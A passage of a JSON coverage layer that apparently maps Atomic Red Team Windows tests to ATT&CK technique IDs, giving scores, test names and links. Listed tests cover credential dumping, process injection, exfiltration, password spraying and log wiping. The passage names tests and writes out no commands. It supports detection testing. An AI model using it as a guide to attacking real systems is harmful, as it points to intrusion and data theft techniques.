Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"comment":"\n- C2 Data Exfiltration\n- Text Based Data Exfiltration using DNS subdomains\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n- Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n- Dirty Vanity process Injection\n- Read-Write-Execute process Injection\n- Process Injection with Go using UuidFromStringA WinAPI\n- Process Injection with Go using EtwpCreateEtwThread WinAPI\n- Remote Process Injection with Go using RtlCreateUserThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)\n- Process Injection with Go using CreateThread WinAPI\n- Process Injection with Go using CreateThread WinAPI (Natively)\n- UUID custom process Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"comment":"\n- Portable Executable Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"comment":"\n- Process Injection via C#\n- EarlyBird APC Queue Injection in Go\n- Remote Process Injection with Go using NtQueueApcThreadEx WinAPI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"comment":"\n- Process Injection via Extra Window Memory (EWM) x64 executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n- Process Hollowing in Go using CreateProcessW WinAPI\n- Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"comment":"\n- Process injection ListPlanting\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n- SOAPHound - Dump BloodHound Data\n- SOAPHound - Build Cache\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n- Command prompt writing script to file then executes it\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n- Indicator Manipulation using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":20,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n- System Information Discovery\n- Check computer location\n- BIOS Information Discovery through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n- Run Shellcode via Syscall in Go\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":4,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n- ESXi - Brute Force Until Account Lockout\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n- Modify Internet Zone Protocol Defaults in Current User Registry - cmd\n- Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell\n- Activities To Disable Secondary Authentication Detected By Modified Registry Value.\n- Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.\n- Scarab Ransomware Defense Evasion Activities\n- Disable Remote Desktop Anti-Alias Setting Through Registry\n- Disable Remote Desktop Security Settings Through Registry\n- Disabling ShowUI Settings of Windows Error Reporting (WER)\n- Enable Proxy Settings\n- Set-Up Proxy Server\n- RDP Authentication Level Override\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"comment":"\n- ESXi - Install a custom VIB on an ESXi host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token 